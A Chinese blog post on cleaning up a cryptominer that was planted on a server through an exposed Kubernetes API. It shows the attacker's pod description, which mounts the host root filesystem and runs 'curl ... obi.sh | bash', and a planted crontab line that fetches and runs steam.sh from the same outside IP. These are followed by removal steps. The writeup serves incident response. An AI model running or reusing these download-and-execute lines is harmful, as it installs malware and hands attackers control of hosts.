发现服务器CPU占用100%,通过top命令发现pubg -c config.json -t 2占用CPU资源,kill进程会自动启动。黑客入侵方式是kubernetes创建pod。

Name:           kube-api-zbplw

Namespace:      default

Node:           120.79.2.25/120.79.2.25

Start Time:     Tue,  Dec  :: +

Labels:         <none>

Status:         Succeeded

IP:             172.17.36.4

Controllers:    <none>

Containers:

  centos:

    Container ID:       docker://c293e7063e2f9c38939d24f707cb752a0b76def937b3f30d784fe8202d14b01d

    Image:              centos

    Image ID:           docker-pullable://docker.io/centos@sha256:3b1a65e9a05f0a77b5e8a698d3359459904c2a354dc3b25ae2e2f5c95f0b3667

    Port:

    Command:

      /bin/sh

      -c

      /usr/bin/curl -s http://35.194.156.203/obi.sh | bash -s;sleep 120;cat /mnt/etc/crontab;echo 0

    State:              Terminated

      Reason:           Completed

      Exit Code:

      Started:          Wed,  Dec  :: +

      Finished:         Wed,  Dec  :: +

    Ready:              False

    Restart Count:

    Volume Mounts:

      /mnt from hahaha-volume (rw)

    Environment Variables:      <none>

Conditions:

  Type          Status

  Initialized   True

  Ready         False

  PodScheduled  True

Volumes:

  hahaha-volume:

    Type:       HostPath (bare host directory volume)

    Path:       /

QoS Class:      BestEffort

Tolerations:    <none>

Events:

  FirstSeen     LastSeen        Count   From                    SubObjectPath   Type            Reason          Message

  ---------     --------        -----   ----                    -------------   --------        ------          -------

  1d            24m                  {kubelet 120.79.2.25}                   Warning         FailedSync      Error syncing pod, skipping: failed to "StartContainer" for "POD" with ErrImagePull: "image pull failed for registry.access.redhat.com/rhel7/pod-infrastructure:latest, this may be because there are no credentials on this request.  details: (open /etc/docker/certs.d/registry.access.redhat.com/redhat-ca.crt: no such file or directory)"

解决方法

1,删除pod

kubectl delete pod kube-api-zbplw

2,修改crontab配置。

cat /etc/crontab

* * * * * root /usr/bin/curl -s http://35.194.156.203/steam.sh | /bin/bash -s

3,关闭crontab,清除crontab配置,再kill pubg进程,问题解决。

service crond stop

最新文章

  1. Oracle_数据处理
  2. HTML Minifier - 灵活的在线 HTML 压缩工具
  3. [原创] WINDOWS 7 精简教程之驱动精简 可用于64和32
  4. MySQL数据库学习笔记(八)----JDBC入门及简单增删改数据库的操作
  5. Params 方法参数
  6. 部署基于JDK的webservice服务类
  7. ng-init
  8. QTbaWidget控件几个例程 【worldsing笔记】
  9. MyBatis学习总结4--解决字段名与实体类属性名不相同的冲突
  10. [Effective C++ --016]成对使用New和Delete时要采用相同形式
  11. merge into sql优化
  12. DOM-----style属性对照表
  13. Order笔记-项目导入
  14. python学习中遇到的问题
  15. redis 在 php 中的应用(List篇)
  16. Gradle 从svn 中检出的父项目后处理配置【我】
  17. 把Web Services生成服务器端C#、VB。或者接口
  18. day039 数据库索引
  19. postman发送json请求
  20. Python 爬取数据入库mysql

热门文章

  1. # 20155219实验二 Java面向对象程序设计
  2. BFS广度优先搜索 poj1915
  3. Windows共享设置
  4. CentOS右键菜单添加新增文件命令
  5. Wood Chipping Text Animation
  6. EasyUI 文本框回车和普通回车
  7. html css input定位 文本框阴影 灰色不可编辑
  8. 命令提示符操作及Java的特点
  9. js判断输入的字符是否是汉字
  10. python基础教程_学习笔记9:抽象